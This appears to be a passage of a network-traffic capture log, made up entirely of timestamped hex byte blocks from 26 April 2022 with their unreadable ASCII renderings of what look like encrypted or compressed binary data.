                                                                              2022-04-26 19:08:56 UTC17INData Raw: 16 c6 d4 f3 e4 11 63 70 7d 16 7d ca 28 ab 58 2e 15 14 d9 8e 66 74 27 66 e6 93 d6 0d 16 ea 0e 84 9a 89 a2 2d e3 0f f8 dc 3e e6 61 34 22 8c db 92 a6 fa 8e f3 0a 34 f4 68 82 98 da 91 62 cc 6f e3 10 94 92 7e e1 dd 74 e5 03 b2 93 23 59 07 9b dc 3d bf fb 40 40 5a 00 a3 aa 97 b7 85 c3 79 dd fd e5 65 eb 06 a8 e6 43 c4 8b e1 a9 41 6c dc 25 8b 91 55 14 03 9e 1d b6 09 0f 54 4f f9 2d b8 d2 ba 5b 16 8d 07 b9 59 7e 4c bf 95 41 7f 22 73 b7 14 6a de 3b a7 d5 a6 e0 be 10 f9 5d ae f9 72 4f d7 ae 88 bc 0d 0f bb 28 e8 c2 0c 1e ae 65 9a 8d bc be d9 7d e1 b3 f3 6c 54 f2 5d 22 d1 9c 21 b2 97 73 87 85 30 11 b0 40 f6 a3 0b 82 21 8d a1 96 68 03 81 ae 65 fd 4a e9 e3 b8 15 6e 86 d2 4b 44 2a df 24 01 b2 67 ed fd 08 09 4e 62 88 a2 aa 8c 84 63 07 ff 14 83 94 13 ed 54 f3 10 27 70 36 e3
                                                                              Data Ascii: cp}}(X.ft'f->a4"4hbo~t#Y=@@ZyeCAl%UTO-[Y~LA"sj;]rO(e}lT]"!s0@!heJnKD*$gNbcT'p6
                                                                              2022-04-26 19:08:56 UTC19INData Raw: cd 10 bc 83 06 3c c7 e6 9e fd bb ad 32 3d 4f dc c6 6b ae 1a 05 f1 e2 af 37 48 4c 77 98 33 80 45 5f 27 60 61 d2 14 83 8a fa 91 16 0f 34 b7 f7 a0 0e 71 9e 8d da c0 4c 69 7f 4a 6e 7a 9c ea e4 a5 21 33 f2 59 cc 4b f7 8a aa 01 e7 6c 78 9c 12 25 95 01 b1 97 b5 a8 80 1e 0b 61 84 71 06 66 a9 e1 67 15 a8 44 d1 10 da 0d 78 cc e0 b4 6a 81 1a f8 ba 1d 5a e5 e9 8b 8e a0 2e 12 7d 61 b6 82 5c 55 2b f6 1c d7 e4 09 d7 78 fe 54 8e 6e 50 bf 00 0d b9 92 49 32 02 6f 09 2c d3 c1 d9 b3 5d 3c 9d 24 db bb ac b2 d5 66 0d b1 3d 74 b4 30 08 8a 08 43 b2 a6 4b 53 32 ff 9c 77 dd f8 07 98 53 a9 fc c5 6d 1e 80 30 4a 1e 0f 06 cc f7 8c b3 cd 03 d1 6d 36 54 01 53 45 e9 ec 11 68 b7 a3 e0 77 6f 78 4b 8d c2 fc 05 03 bb 85 83 3a 31 80 a3 b1 42 af 37 5a 05 2d c0 29 8b ba 26 8e 7d 83 c1 05 b2 b7
                                                                              Data Ascii: <2=Ok7HLw3E_'`a4qLiJnz!3YKlx%aqfgDxjZ.}a\U+xTnPI2o,]<$f=t0CKS2wSm0Jm6TSEhwoxK:1B7Z-)&}
                                                                              2022-04-26 19:08:56 UTC20INData Raw: e3 18 ce 8e c6 79 6c da 4f f2 63 4c 12 8b 50 ca d9 3a ba 54 29 cc 9d e1 8a cf d5 a8 e3 6c 12 cb 1f 5f 3e 3e 83 18 3d 22 89 3c be 62 48 ff 2f 22 e7 63 62 b6 31 e7 a6 89 06 81 8b 22 0a ed c4 e9 27 98 37 0a a4 5f 69 cb 34 0e 39 5e 01 96 4b 0d 51 7c 39 a8 0b 30 da 22 1e 81 52 15 4f a3 ff c9 a2 f4 d1 95 8e 73 51 78 f8 77 14 6d ce 38 e1 71 9c f9 9e 15 1a 8d 03 76 74 ef f0 94 61 e5 9d e5 dd 6e d4 d7 65 fe a3 c2 49 8d 24 8d 29 62 21 a5 31 73 a2 86 86 37 fe 42 c5 7a 36 69 57 8d 8d ca 9b c9 24 9e 31 32 59 60 f4 c7 bc 1e 2a 52 59 75 a0 1a 06 d6 ae 75 8b 9d 6b 6a 1e 99 0f 1c 62 3e 4e 09 aa 7e e5 69 f3 41 57 1e 3e a7 63 be cc 1e a1 d3 4f e1 76 ef 36 fb 3e 0e e5 49 c8 1a 3c de 2f 19 e7 40 3b 3f 30 0c ab 9d c2 56 ea 84 a5 c7 0f 67 71 8a 2f e6 65 f2 8b ea 9e 38 64 64 8d
                                                                              Data Ascii: ylOcLP:T)l_>>="<bH/"cb1"'7_i49^KQ|90"ROsQxwm8qvtaneI$)b!1s7Bz6iW$12Y`*RYuukjb>N~iAW>cOv6>I</@;?0Vgq/e8dd
                                                                              2022-04-26 19:08:56 UTC21INData Raw: 69 3d 95 ac 30 14 44 eb d3 67 91 a6 f8 af 78 a4 e2 30 e7 c0 bb 4d 30 e1 7f 1d 58 31 c6 c5 f9 50 c5 58 95 a5 e2 aa c6 f0 b9 65 dd cf 4a d8 fc e6 28 f0 28 19 69 34 1c a2 28 6c 2c 2b 37 26 81 31 19 d4 9e d5 1c 15 35 0f 77 9b 4f 0f eb 35 c0 ff 3a b7 c6 b8 f2 ca c7 d2 0a 29 d9 16 24 4a 29 f7 2d 5e 7e f5 0f 3f 09 50 20 4b 0b 1a 4e 44 af 14 bf 57 0c 16 2c 7e a8 b2 e6 a5 ca 2e e1 39 65 55 e3 fd 9b a4 fc 17 41 3f 51 7f 7e 93 a9 bd 3e ab ab 9a 45 b1 ac 24 06 40 65 29 92 4e 69 55 a0 ba 68 82 6a 85 ae 78 93 df b2 62 5a 2d 41 2f 41 47 cd f9 3b 64 af 57 2a b1 cf 7b 2f 4b 1f 7e ac b8 a7 9c 50 50 a6 f9 48 43 93 50 df a9 c5 2b 33 ff 34 46 8a 29 01 4c a8 82 30 d6 3f b1 56 76 fc 61 bd e2 76 40 c6 20 0b a8 19 1d 47 f5 55 05 b2 00 f3 4c 48 83 fd c2 74 68 c8 c6 f4 af 13 55 fe
                                                                              Data Ascii: i=0Dgx0M0X1PXeJ((i4(l,+7&15wO5:)$J)-^~?P KNDW,~.9eUA?Q~>E$@e)NiUhjxbZ-A/AG;dW*{/K~PPHCP+34F)L0?Vvav@ GULHthU
                                                                              2022-04-26 19:08:56 UTC23INData Raw: 74 2f c1 ef 81 72 f7 88 d9 1c b6 98 17 f3 68 5c 9f 7a 70 78 e1 bb 27 ec 2a cb 1a d4 3c ba b3 a3 4f 77 31 e8 5a ce 5e 74 af 5a 0a bd b1 ea 32 e7 4c d6 02 f7 de f4 0b 63 c1 25 52 6b 7f af e1 3f 17 77 94 51 54 0d 55 16 b3 7c 85 cd fe 46 e9 d0 aa 1a 9f 03 9d d6 02 f4 26 c9 69 37 30 84 4b b4 73 fe b3 a3 fc c1 c0 ef e2 bc 4c c2 46 cb d6 c1 81 e3 88 a7 ab 57 ed 91 98 78 a7 ae 59 10 1b 4b 31 74 7e e4 d2 42 43 99 61 ff 14 e2 db 0d e5 48 ad be 7c 45 1b 05 4a 3a ab 11 f8 ab 2f db ed 0a 96 fe 00 fc 59 71 97 b1 0d 57 7c f0 ce 61 ec 0e 5b ec b0 b2 a7 8a e1 be fb 4a 04 1f f3 8f 28 fc a5 99 37 a2 a3 71 b5 38 9b dc d4 05 54 0d 78 23 ec dd 24 bc 8b d9 d3 ec b7 21 42 69 38 c3 1c 63 d6 f5 44 93 81 0c 0d 85 c4 5a 97 72 d4 63 e6 ae 66 72 0c 22 42 49 f1 6b 42 92 59 12 35 9f 88
                                                                              Data Ascii: t/rh\zpx'*<Ow1Z^tZ2Lc%Rk?wQTU|F&i70KsLFWxYK1t~BCaH|EJ:/YqW|a[J(7q8Tx#$!Bi8cDZrcfr"BIkBY5
                                                                              2022-04-26 19:08:56 UTC24INData Raw: 92 47 ad c0 fb 60 30 a6 ee 40 09 a8 4e 5f ad d0 0b d4 3e 27 4f 7a 00 f6 77 6e d5 04 00 3d 84 6a 93 43 57 70 73 7d 3e 51 25 ae 9f 06 54 e2 c8 2a 84 d3 33 70 1a 25 07 04 ae 33 64 4f 85 8e ca be 80 c3 d3 f2 74 f7 71 6e 30 af e7 9a ab 20 f6 fc 76 57 86 3d d5 d4 76 30 77 6d c8 13 7b b3 14 53 c9 90 eb f4 d6 5a 1a 02 10 d2 14 d3 5e ea 4a 3d a2 5c 2e 99 2c 42 36 1d 95 f3 7f d0 91 cb d1 a0 34 4a fd 2b a3 37 d9 ed ac 33 8d d7 25 74 cd 59 17 ed 07 20 05 c7 eb 54 8f 01 a1 6c 6c 14 95 1f d9 b2 ae 9a 7a 04 a0 3a 9c 6f b2 49 52 03 17 0d fe ac 64 cf d9 6e ee a7 68 d1 69 53 da 74 0b c3 18 25 09 62 44 04 6f 2b 8e 6a f3 4b 77 6d f2 ee 5e aa e3 fa 2f eb bd 84 da 23 2e fd 42 bd 7f 57 88 0b 88 e3 94 87 4c cc 77 08 38 31 47 54 bd 0c 11 56 07 c2 12 8d 4f be a3 c8 6e 6c d9 56 07
                                                                              Data Ascii: G`0@N_>'Ozwn=jCWps}>Q%T*3p%3dOtqn0 vW=v0wm{SZ^J=\.,B64J+73%tY Tllz:oIRdnhiSt%bDo+jKwm^/#.BWLw81GTVOnlV
                                                                              2022-04-26 19:08:56 UTC25INData Raw: 12 b8 d6 c9 36 a6 15 ff 61 ec 04 4d 9c 42 df 6c ca 69 27 0b d7 4b 8f 23 23 4c 38 75 7d 1a cc cc af e0 00 bb dc a3 5b 6a 7d e3 10 17 f9 7b 68 42 c7 9f fc 55 ee 09 c7 84 1f 53 8e f0 23 96 7d 76 5f ce 95 c1 7e d0 8f 6c f0 8e 2d ae af 4a 63 b6 95 46 85 c1 1f dc 16 bc da ac 8e 62 50 0e 54 15 e0 06 cf 13 c3 c7 28 72 5d c7 db 0b 54 e4 b5 2d da 1e b9 c5 24 52 1d 7c 34 ea b0 f7 67 67 ab 99 6e 94 76 7f 11 28 e6 a2 f0 62 2f ca 96 c8 b3 f7 20 ac 33 e3 22 83 ca 84 91 d0 37 0f 4b cd d6 b5 05 e9 ca 9b 5a 0f 42 22 3b 79 9f 85 cb 9b 6c a6 34 90 ed f8 3f c4 a3 ab d9 88 d0 c5 26 18 7e f9 0e d5 66 9e 41 26 58 cc 3f fb 4c 8a ea 64 7f cb 41 27 d3 cd aa 3d 6c a7 53 aa e2 d1 9a 30 e2 9b 27 03 ee c4 01 7d 56 26 1d 4e 07 f9 84 7c 05 ef 69 6e 38 5d 95 af 87 67 99 41 32 92 0d f4 b5
                                                                              Data Ascii: 6aMBli'K##L8u}[j}{hBUS#}v_~l-JcFbPT(r]T-$R|4ggnv(b/ 3"7KZB";yl4?&~fA&X?LdA'=lS0'}V&N|in8]gA2
                                                                              2022-04-26 19:08:56 UTC27INData Raw: 13 1e de f6 63 fd 2c e4 98 f3 d7 59 27 49 49 3c 80 2e 36 18 ca c1 44 87 d1 11 93 3e 0a 5d 55 b5 b6 7a 3d 62 bd 80 37 0c e0 b1 fa b0 a7 f1 39 86 4e da 7c 69 f3 b9 d4 46 f3 44 8d 1d 8e 51 61 97 dc 68 20 51 36 0b 0a 82 3a 76 5c ae 32 ae 78 55 c4 36 29 81 2e 2c 5a a0 43 27 8a b6 cd d8 ce d1 ff 97 43 29 d3 8c c2 d4 eb 03 3f 7b 8d 5d b0 92 50 5a db c7 d6 a8 f6 f5 b9 f0 2d 82 eb 2d d9 91 b3 05 df 48 56 d7 5d ad 7a 40 f6 ff 37 f1 b5 1e 83 e0 c3 42 ec ee ad b8 21 29 c6 33 39 ca 33 c2 40 79 3f d7 f1 4a 7f 85 81 bb a9 5c 95 42 aa 32 66 c8 ba 0e d0 0e 2f 54 5e 22 93 e0 3f 37 7a 81 d6 e0 ef 0f e0 f2 70 95 ea 93 bc 81 82 c9 97 f6 ef c2 2c ea 35 1b d1 3b f8 63 a1 1d 3e 3a 2e b7 f2 a2 dc 99 dd 4f da 94 a0 4f c3 8a 88 d8 ff 9a 58 29 bf 95 68 6e ac 5a 3c 75 bd 71 b0 bf 68
                                                                              Data Ascii: c,Y'II<.6D>]Uz=b79N|iFDQah Q6:v\2xU6).,ZC'C)?{]PZ--HV]z@7B!)393@y?J\B2f/T^"?7zp,5;c>:.OOX)hnZ<uqh
                                                                              2022-04-26 19:08:56 UTC28INData Raw: e7 d4 56 f8 40 44 1e fd b1 a1 99 6a 64 87 e2 38 2e 47 29 b2 39 f4 f2 0d 5e 5a 5f bc ca 8f 65 b7 31 75 6c 05 06 cb 09 a7 5d 06 ab 63 23 a9 db 43 8a 1e fa 93 96 c5 40 f6 95 9e 18 eb 07 04 e3 bf a0 0d 68 ab 79 47 e2 da fb de 6f 70 df 78 6f 32 de 0e 80 a9 6e 98 76 68 2a b0 b9 fe 77 fd 2e 84 50 ad af ba a2 b8 55 94 b7 d5 da 19 09 af e6 c0 0b af b0 36 16 86 91 3b 74 92 c8 98 ba 74 47 d0 e9 92 77 a4 43 84 7a 0f b1 35 a9 35 8e de c1 9f 8d 3c f3 84 72 fc f1 c9 b4 d2 3d 80 a9 21 ea fe 25 01 0c 3a 76 6f 77 40 19 34 14 4d c5 87 02 3b c9 58 fe b6 78 bc 2e 9b 7a ee 22 cf c4 9c 9c c2 b3 45 bd 08 f2 87 5c 91 9c 4d e6 7f 3f 6d eb ce 4a 27 8f ea 18 be 18 7d a0 a0 52 54 b8 3b ba 68 fd 9c 2f b6 5a ec 43 f0 93 67 2a 53 5e 7b a2 2e 28 20 ef ae be a2 8a 41 e1 9c 4f c6 f9 2b 15
                                                                              Data Ascii: V@Djd8.G)9^Z_e1ul]c#C@hyGopxo2nvh*w.PU6;ttGwCz55<r=!%:vow@4M;Xx.z"E\M?mJ'}RT;h/ZCg*S^{.( AO+
                                                                              2022-04-26 19:08:56 UTC29INData Raw: 65 0f eb e0 3c 2a 26 42 5b 4f 3e 44 f3 a3 97 27 35 5a ed 5b 4a b4 42 91 82 03 9b 0d 1d 13 09 97 ab 32 a6 84 f6 32 1b 4a ce de 0b 9e ff 6c 83 40 86 b0 8c 5d 7e e1 02 43 81 88 47 bb a1 8b 23 c5 ed ae 1a 9c bd 9e 92 50 fd a5 be d9 cb ce 9c eb 9e a4 c1 b5 2d e1 a7 19 9e 79 96 cd 6b 47 75 a8 92 20 37 c3 43 08 ec 17 08 3a ed 8c 9c 38 7a b2 e5 75 16 28 b4 3c 99 dc 1e 65 53 f0 f1 26 73 ea 17 ea b0 56 58 64 ee 69 c4 2c f0 40 91 60 2f 3e 04 0a 0e 8f 4c d9 92 77 b8 80 4c 62 fe 02 5a f1 18 95 a4 ae 63 55 3d 5e bf 1c 32 66 0f 6f 7c 75 ea 2e b6 a5 1a a3 ea 77 1a 6d ca 0e 61 46 6c cf ad 17 1e 4b 31 fe 3f 4f 01 ff 26 5c 5c 74 24 a8 c4 aa f5 92 a2 75 96 ef ce 3e b3 9e 02 a2 a9 b7 5c 2f 40 e4 e0 20 09 7d cc f5 28 66 f5 ac bd 52 57 c2 c6 36 9f 99 82 c8 6b cc 02 34 c5 ba 69
                                                                              Data Ascii: e<*&B[O>D'5Z[JB22Jl@]~CG#P-ykGu 7C:8zu(<eS&sVXdi,@`/>LwLbZcU=^2fo|u.wmaFlK1?O&\\t$u>\/@ }(fRW6k4i
                                                                              2022-04-26 19:08:56 UTC31INData Raw: 06 ac cf cb 91 dd 2a f7 ba 7c a5 bf 77 01 2f b1 8b 21 ac da b6 5d a2 b8 16 65 e8 3f 6b 3c 4b f2 c8 c2 f3 19 9f e3 70 b5 8d 96 ca 4c 86 7b 74 c8 c6 4f ad 37 4b 96 6e 5d 53 8d 0e 24 79 ad 87 66 1f 2d b9 46 82 a4 38 fd c6 dd 35 2a c4 5b 40 3f b8 f5 bd a0 c1 f5 43 f1 1e b8 e6 c0 ab f2 75 70 02 12 09 0e 76 38 91 6f 11 73 30 7e 90 81 a2 4d 0d ea df 1d d2 45 ec 36 35 30 ba ba 30 40 73 bc f3 21 3f 15 51 d0 19 85 f7 15 72 4c 6a b3 9e c8 00 98 11 e9 ae bb 1a e3 0e a6 52 3f c5 7a ba 30 c4 06 67 44 96 23 48 fe 34 c8 aa 3c 91 13 1e 81 c4 97 19 e1 18 ac 6d 28 06 34 ff dc 8b c2 7e ac 0c 03 6c c6 51 3a 1e 05 95 d1 10 5a 51 56 e6 bc 7b ad 4b 9a 47 2c bf c8 9f 16 a5 4c c6 75 25 cc 7b 2e 87 c7 8b 65 b2 9b 66 6c 91 1b ba bf 89 9c dd 90 8a ab b1 5a a9 22 78 10 97 bc b1 ba d7
                                                                              Data Ascii: *|w/!]e?k<KpL{tO7Kn]S$yf-F85*[@?Cupv8os0~ME6500@s!?QrLjR?z0gD#H4<m(4~lQ:ZQV{KG,Lu%{.eflZ"x
                                                                              2022-04-26 19:08:56 UTC32INData Raw: 75 3c 1f 43 4a 20 43 f3 2e 19 65 77 c2 ae aa 33 88 6c 30 0c df a0 58 17 19 d8 aa 24 c1 3a 17 aa 50 e8 4b c6 e5 f2 f6 f5 c9 0f 6c ad 08 67 30 cd 4f 0f 3f 76 5f 58 6d 31 7b 83 8a 67 bc 72 ff 1c 32 85 da 7b ed eb da a1 ca 07 44 1a 14 36 81 4e 15 b7 e0 d8 0c c5 3a ed 45 71 1f 37 d0 e0 20 1b 86 84 ca 05 b9 6f 48 05 c5 83 cf 6d 44 dc ce 76 20 83 fe e5 a7 db a8 c7 a1 8c 7c 37 34 9f 00 27 87 22 17 0c 81 fb fe b1 29 c3 4a cd ce 5c 71 93 19 ac 42 d1 f6 2b 6e 7b 18 cb 6b 1b a0 b4 77 48 26 90 67 0d a9 98 dc 50 b6 b9 5c 62 0b 69 ee 7c b5 b9 43 31 43 96 44 59 48 79 fc f6 d6 d0 0c 84 1a d3 bd 43 7b 3f 17 3c 1a 5f 8f e8 37 a8 9a da aa 7a b5 44 78 50 64 d4 bd c2 a5 06 a0 6d b8 39 89 a3 65 56 d9 7a be fc 90 4c ce 3c b7 81 8d 11 0a 82 1a 2a 02 b5 a5 ec 5b ac b5 79 52 d0 22
                                                                              Data Ascii: u<CJ C.ew3l0X$:PKlg0O?v_Xm1{gr2{D6N:Eq7 oHmDv |74'")J\qB+n{kwH&gP\bi|C1CDYHyC{?<_7zDxPdm9eVzL<*[yR"
                                                                              2022-04-26 19:08:56 UTC33INData Raw: e6 6a 0f 8e 4b 3b 24 54 3e ca be ae 29 08 8f 8a 0d e0 fb 4a 86 e9 a8 20 5c d3 20 c0 02 b3 3c 83 16 31 14 dd b0 c4 9d fa 7c 9c b7 f6 88 61 72 7b 4d 06 cc 8a 98 1b 40 79 63 d4 e4 e1 bc c4 1e 50 3b 0a 44 d7 6c 84 96 68 78 d5 0f 4a 56 8f d7 05 34 b8 95 e4 a6 0a bb f3 35 54 d0 86 2e 94 ec 2f 5d 85 6a 35 7a 0f 25 ba da 7c cc 58 41 ed e5 bc 49 00 46 07 e9 6e a5 b7 00 f0 cc 2a 27 0a bd 54 88 33 9d 9e 4e b3 4f 5f c1 0f 06 76 27 a6 01 5d 0b ab 11 d1 17 d0 98 07 2e 3b 9f 90 e3 f5 d3 c6 31 c6 09 a9 60 01 6a ca 92 84 cf f1 db a3 1d f5 bb b4 92 d3 e5 4d e2 81 46 20 b6 95 67 c1 bd 4f a5 a6 02 b8 a2 d7 12 15 0e 63 a9 ae fb 59 bf f0 3e 02 d2 a1 0d ca 8f af 58 2e 93 df e2 5e d2 99 d1 10 19 3a 47 de 8f 37 cf 5d ba c7 1d af 2e 80 65 7b e7 3a a1 bd 4a ba ab c3 2e c9 a4 1c ce
                                                                              Data Ascii: jK;$T>)J \ <1|ar{M@ycP;DlhxJV45T./]j5z%|XAIFn*'T3NO_v'].;1`jMF gOcY>X.^:G7].e{:J.
                                                                              2022-04-26 19:08:56 UTC35INData Raw: b9 6e 35 ad 71 26 20 bb 3e f4 2e 80 b4 a6 97 f4 9d 15 7c 8a 38 28 45 de 40 f5 a6 c9 b0 21 fe 6c 37 79 bd 63 f6 41 02 7a 3a 8a 6d 3c 8f 4c 03 b1 30 bb a8 a1 2a a1 2b 37 28 41 b4 58 a4 68 20 e2 17 77 e7 af a4 0e 41 df 33 18 7d eb 79 84 48 4a d5 0a a6 60 34 44 61 cd 76 44 ae d5 77 77 72 c8 a1 e1 f3 14 d7 78 45 93 24 ff bb 7b 25 41 df 38 ce 36 97 e3 f0 4c 13 5d 7b 18 0d f6 d8 44 21 0b 12 97 bf 99 80 c9 aa 85 03 35 93 e8 4c 2a fa af 62 62 d9 dd 26 96 83 99 4f 7d 73 ec 01 98 d7 61 f8 3b b4 78 b4 4e 13 01 b9 1d 68 62 f6 44 04 a1 4e e4 5c bc 1a 88 ea 75 04 35 8e 95 18 2b 9f 26 be 60 82 12 5d 38 84 fb 70 e6 b2 f3 28 88 ef 30 bb 4a 25 7c a1 40 71 6b 4e 94 05 1d 05 3f f4 cd c7 6e 1c 7d bc 1e 5f 7c ce b1 5c 50 45 88 af 8d 70 4f b0 3b e0 fc ce d4 c0 98 95 a5 8a b8 fc
                                                                              Data Ascii: n5q& >.|8(E@!l7ycAz:m<L0*+7(AXh wA3}yHJ`4DavDwwrxE${%A86L]{D!5L*bb&O}sa;xNhbDN\u5+&`]8p(0J%|@qkN?n}_|\PEpO;
                                                                              2022-04-26 19:08:56 UTC36INData Raw: 06 5d 3a d3 8c 28 e6 6f 1c db a2 93 46 5b 27 d3 2c 93 68 5e a4 fa 76 d3 2e 2b 1a aa 05 16 1c d5 14 1d ec 43 17 bc 1b 25 6c 73 ce 81 37 ac e1 ac 29 5f 27 a7 4d 4b 18 83 6c 39 ca 6b df 89 11 22 97 27 7f f4 e9 ca 9a 15 32 d0 76 f0 97 f4 a5 f8 5e 2b 54 51 c1 b3 f4 ba a2 4a 5a f7 40 16 4e 4c c1 60 ab e5 8a 7c c2 aa 32 13 01 14 d4 b5 00 b8 99 cd 3d 2b a9 3a 30 92 40 c8 25 98 60 d8 64 ae 26 d2 ac ef d4 7d 83 84 c8 5d 4c 4a ef 8e d1 8a 77 fe 4a d1 f1 99 b7 b6 23 66 28 2a 68 72 0c 2a 8b 55 cd 89 74 da ff 0a 69 1f 29 4d ff 89 f4 7a d0 56 7f 30 83 d2 c4 b7 a6 68 52 8f fe d3 eb c7 a8 f5 d7 51 f7 09 52 20 cb c7 63 db f4 4b b6 69 1a 47 04 52 85 81 70 8d 66 8a 44 4f c6 40 5e 54 a5 e3 18 71 0c 6d 0d f6 b7 77 20 c1 a4 39 62 1d 54 38 fb 42 43 21 21 35 ea af f2 38 de a6 7a
                                                                              Data Ascii: ]:(oF[',h^v.+C%ls7)_'MKl9k"'2v^+TQJZ@NL`|2=+:0@%`d&}]LJwJ#f(*hr*Uti)MzV0hRQR cKiGRpfDO@^Tqmw 9bT8BC!!58z
                                                                              2022-04-26 19:08:56 UTC37INData Raw: 21 c8 ce a7 db 13 a6 76 37 b9 de d7 4f e5 5d 35 f4 0a 83 11 ef bc 84 d9 80 b9 bb be 84 35 ac 22 fb 8c 04 1c c0 e0 2b 84 f1 91 ac 1a 7a 23 21 5d 66 49 62 4c b5 20 28 9d 7e 12 f1 0e 35 07 14 73 db 2c 54 4f 50 38 c9 74 a8 8a 45 e2 4b ce 5c bd d7 4e 67 33 02 ed c5 1d 43 a0 1f 79 29 63 93 20 ab ac 22 3c 6c 6d bd 9d 6e fa 67 1f 4a 5f 03 e6 d6 52 bf 33 63 f3 9f 16 c3 5d 20 b0 41 da c6 f8 cc 9f 7e ca 04 77 16 a6 d0 20 69 ac 82 b9 fd 3f ed 16 84 b5 48 e4 13 90 33 e9 35 d6 73 33 ff 48 fd ff 70 f9 ce d5 c9 12 07 cd e7 d6 63 e9 b8 03 a4 6b 2d a8 e3 f2 e3 63 c9 84 06 8b 17 41 18 e6 d5 fe f6 ef 4e 4d 11 94 0e 6f 91 3b 2a 51 c6 c7 81 f7 04 cc 87 45 86 25 a1 fb 4a c7 45 c6 88 00 bc 10 5b 10 35 47 a5 ec 45 f6 76 95 84 40 be 37 da 78 06 8d a3 b1 7b 2e 67 13 1e 1c 1f a6 ef
                                                                              Data Ascii: !v7O]55"+z#!]fIbL (~5s,TOP8tEK\Ng3Cy)c "<lmngJ_R3c] A~w i?H35s3Hpck-cANMo;*QE%JE[5GEv@7x{.g
                                                                              2022-04-26 19:08:56 UTC39INData Raw: bd b3 20 5c ed f2 fa f7 d3 6c 82 55 d9 67 ca 9c 6e ae cc 9a 2b ea c8 48 b1 cf c1 41 73 22 16 1c a4 c1 5f 52 f2 cd aa d5 cc 2b 8d d9 4b 27 9f 15 d9 20 c8 3e 07 e8 74 46 78 54 05 ee 46 76 40 93 25 5d 55 63 86 a4 50 e5 d9 14 16 19 c9 e0 a3 2c 83 06 90 30 4d db 79 31 1e 11 e9 24 22 6b 68 4a bf 30 9a 57 1a fa dd e5 71 c7 78 c2 f2 58 1c e3 bf 78 cf e5 00 ff d4 b3 8d 2b 75 91 38 49 01 98 2a 30 3a ea 06 7e 6c 57 e8 42 5d 8d aa d0 78 7d 83 0f 31 c1 a8 26 4d b5 90 75 31 8c 6d d3 c8 13 7e 65 1d 08 ae f1 db 1e f9 74 bb dd de ba 60 e1 74 28 2f d1 63 f9 a4 21 2b 8a 93 2a f6 4c 2e d0 63 54 71 11 cb 71 16 28 87 22 33 fb df 77 cb 3d 8d 45 f6 39 8b 7e a7 9e 12 d7 9a ad 78 87 85 54 50 84 9c 61 72 c2 87 24 3b 14 77 76 94 0a 15 5d bf 9a 4a 6c 9c 85 14 43 5f 33 e3 ac 89 a6 28
                                                                              Data Ascii: \lUgn+HAs"_R+K' >tFxTFv@%]UcP,0My1$"khJ0WqxXx+u8I*0:~lWB]x}1&Mu1m~et`t(/c!+*L.cTqq("3w=E9~xTPar$;wv]JlC_3(
                                                                              2022-04-26 19:08:56 UTC40INData Raw: 12 bb ba 70 2a 23 16 5f a9 1b 81 d7 f4 16 a1 01 2b 90 aa c3 5b 3c 2f cf 16 b5 0d 0c 81 16 1f e0 b6 24 ae fb 11 87 b0 11 b4 14 19 83 56 78 e9 94 d6 d8 a3 7c 43 e6 09 b3 20 47 cc 7e 14 87 54 e6 b4 9c dc a0 8f aa 0d 9c a6 fd 66 6a 8d 2f a2 2a 57 58 ae 4b 5a 17 a7 38 41 7c 41 0e c5 ed e2 32 d1 4b 92 20 c1 a8 3c 3e d3 c3 d4 eb 43 0d c2 30 de ae 9f 26 e0 a7 8f a2 fe ab 2c b9 a8 bb f4 19 38 b2 96 cb 33 e4 7a 97 b0 07 9b 61 ef 9e 4f db 2f 86 e5 49 e3 93 29 92 49 2c 78 55 98 0d bb c0 d8 81 ba 78 52 5c cf f0 91 2d 28 c4 c0 74 dd 28 6e 28 f0 9e ec 2b 4d b8 38 82 e5 37 8c 01 ce b8 1a 34 9c 8e b8 b3 c1 95 ff 08 0e 5c 96 1a 3d 46 7c 93 d7 80 cd bb ae 1c 5d 42 5f ae 9d 2f 8b 6d d8 b7 a6 66 a8 2d 35 2c dd c0 fc 80 21 3b 83 82 47 06 98 16 8c d7 a9 30 f7 43 cf a8 ae 40 f2
                                                                              Data Ascii: p*#_+[</$Vx|C G~Tfj/*WXKZ8A|A2K <>C0&,83zaO/I)I,xUxR\-(t(n(+M874\=F|]B_/mf-5,!;G0C@
                                                                              2022-04-26 19:08:56 UTC41INData Raw: 42 2c 55 f0 57 ce 73 81 6e 2a 0b fc 72 96 55 77 44 a6 0a 91 e9 4e 89 7a 2b 0d 0e 15 3f ad ce 8c 6e df 61 3c 53 de e1 fb 9e 75 ec 5b 0c 28 84 a8 67 fb 4e fe c3 5b e2 54 52 fe e8 bc 09 44 2d ef 6d f6 90 7a 0e 8d 5d 1e 44 62 8c 78 fc 5d 43 5f b9 41 d7 ba 6b b3 56 d3 3c 3d ae b1 a0 2f 24 11 38 21 96 d1 fa 40 4a 45 54 f3 7a 9a 3e bb dc 50 49 08 9b 75 e8 00 4a 02 03 b1 63 5d d9 19 86 ce e8 a1 0a d1 91 c0 91 e0 7f 88 ce 3d fe f5 c8 a6 0e 55 08 37 c1 34 80 7b a3 50 29 b9 f4 86 e7 03 b0 5c 10 f2 fc ab 35 25 5d 8d f5 8e 65 81 a2 e0 59 6b 87 b0 02 af a2 4d 70 e2 bf 11 2c 52 a6 54 d7 ee bb 8a 66 2d 5f 1b f4 47 33 3a e2 94 0c 86 d9 c5 d4 4c a9 38 5f 32 7e fa 60 c1 d4 ab cd e9 d8 3e f6 64 7a 73 36 4b 1d 3a 07 f8 7a df fc 66 95 d1 5a 4a bd 03 45 87 5c 90 c5 d8 f4 7e 69
                                                                              Data Ascii: B,UWsn*rUwDNz+?na<Su[(gN[TRD-mz]Dbx]C_AkV<=/$8!@JETz>PIuJc]=U74{P)\5%]eYkMp,RTf-_G3:L8_2~`>dzs6K:zfZJE\~i
                                                                              2022-04-26 19:08:56 UTC43INData Raw: a7 9d 89 cd a5 60 65 12 90 5a d8 60 67 0f ec da 4d 98 e5 64 fb 08 e9 ec 6e 6c 65 04 83 a0 cb d6 0a 8d 0a ac a3 b6 f4 36 95 d9 82 7c c9 9d 3e 44 4b 80 6c 4a 96 d5 01 0b e2 86 42 cb a4 16 62 d3 ba db 8c 03 06 60 2f ab f7 ec 8a 92 15 f7 f7 e2 f4 63 6c 5f 85 4a 60 c4 d9 0f 2b 88 8a 22 ff 79 24 0e c4 a0 c2 56 34 b3 26 c0 6f f1 6f 3c ce 9a 32 9b 96 2f ae 64 e6 15 16 61 54 70 10 cd 3f 67 c1 fc d1 98 f2 32 be 7e b9 4d 78 41 90 dd 35 e4 c8 26 5b 41 18 48 81 ce cf 55 76 21 d0 a5 87 44 27 c8 7f 1b a4 b7 02 ee 89 d9 86 9f 82 fe bf dd 7c e3 84 6b c3 d6 e1 c1 90 20 6c e0 25 58 c9 1c f5 dd 96 39 c0 72 88 ef 